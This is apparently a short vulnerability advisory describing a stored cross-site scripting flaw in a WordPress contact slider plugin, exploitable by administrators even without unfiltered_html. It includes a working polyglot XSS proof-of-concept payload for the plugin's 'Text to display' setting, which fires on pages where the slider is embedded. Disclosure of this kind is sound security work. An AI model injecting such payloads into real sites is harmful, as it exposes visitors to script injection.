The plugin does not sanitize and escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
Create/edit a Contact slider and put the payload below in the "Text to display" option: <p>';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></p> The XSS will be triggered in page/post where the Slider is embed, of all frontend pages if the "display on all pages" option is ticked in the slider
Asif Nawaz Minhas
Asif Nawaz Minhas
Yes
2022-10-10 (about 7 months ago)
2022-10-10 (about 7 months ago)
2022-10-10 (about 7 months ago)